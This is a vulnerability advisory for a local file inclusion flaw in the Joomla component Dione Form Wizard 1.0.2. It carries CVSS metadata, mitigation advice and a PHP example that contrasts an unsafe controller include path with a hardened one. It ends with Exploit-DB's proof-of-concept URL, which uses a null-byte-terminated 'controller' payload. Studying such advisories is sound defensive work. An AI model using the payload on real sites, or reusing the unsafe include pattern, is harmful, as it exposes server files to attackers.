Vendor: Dione Form Wizard
By: Chip D3 Bi0s
CVSS: 8,8 (HIGH)
Type: Local File Inclusion (LFI)
CWE: 98
Product Name: Dione Form Wizard
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:dionesoft:dione_form_wizard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla!
2010

Joomla Component FDione Form Wizard lfi vulnerability

A local file inclusion (LFI) vulnerability exists in Dione Form Wizard, a Joomla! component that lets website administrators create web forms easily through a simple drag-and-drop editor. An attacker can exploit it to gain access to sensitive information by sending a specially crafted HTTP request containing an LFI payload. The payload reaches the vulnerable application via the ‘option’ and ‘controller’ parameters in the URL.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
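
One way to apply this mitigation to a controller lookup, as an added example that is not taken from the advisory or from Dione Soft's code. It assumes the component builds an include path from the `controller` request value; the function names, the `form` controller and the demo directory are hypothetical.

```php
<?php
// Added example, not the component's code. Assumption: the controller file is
// chosen from the "controller" request value. All names here are hypothetical.

// Weak form: the request value flows straight into the include path.
// PHP before 5.3.4 also cut paths at a NUL byte, dropping the ".php" suffix.
function controller_path_unsafe(string $base, string $name): string
{
    return $base . '/controllers/' . $name . '.php';
}

// Hardened form: character allowlist, fixed list of known controllers, and a
// realpath() check that the file really sits inside the controllers directory.
function controller_path_safe(string $base, string $name, array $known): ?string
{
    if (!preg_match('/\A[a-z0-9_]{1,64}\z/i', $name)) {
        return null; // rejects "/", "..", NUL bytes and empty values
    }
    $name = strtolower($name);
    if (!in_array($name, $known, true)) {
        return null;
    }
    $dir = realpath($base . '/controllers');
    if ($dir === false) {
        return null;
    }
    $path = realpath($dir . '/' . $name . '.php');
    if ($path === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree and request values.
$base = sys_get_temp_dir() . '/dfw_demo_' . getmypid();
mkdir($base . '/controllers', 0700, true);
file_put_contents($base . '/controllers/form.php', "<?php // demo controller\n");

$known = ['form'];
foreach (['form', "../outside\0", 'form/../form', 'unknown', ''] as $input) {
    $unsafe = json_encode(controller_path_unsafe($base, $input), JSON_UNESCAPED_SLASHES);
    $safe   = controller_path_safe($base, $input, $known);
    printf("%-18s unsafe=%s safe=%s\n", json_encode($input, JSON_UNESCAPED_SLASHES), $unsafe, $safe ?? 'REJECTED');
}

unlink($base . '/controllers/form.php');
rmdir($base . '/controllers');
rmdir($base);
```

Only the `form` value resolves to a path; every other constructed value is rejected before any filesystem include could happen.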

Exploit-DB raw data:

-----------------------------------------------------------------------------------------
Joomla Component FDione Form Wizard lfi vulnerability
-----------------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Email		: chipdebios[alt+64]gmail.com
Date		: 2010-05-13
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   	: Dione Form Wizard
version       	: 1.0.2
Developer     	: Dione Soft Company
License       	: GPL            type  : Commercial
price		: $20
Date Added    	: 9 may 2010
Download      	: http://dionesoft.com/products/dione_form_wizard/product.html

Description   	:

Dione Form Wizard is a Joomla! component that allows website administrators to create web forms easily through a simple drag-and-drop editor.

This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP.

The main idea of the Dione Form Wizard is to give you a tool that enables you to create dynamic forms in minutes within your Joomla! CMS.
---------------------------------------------------------------------------

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++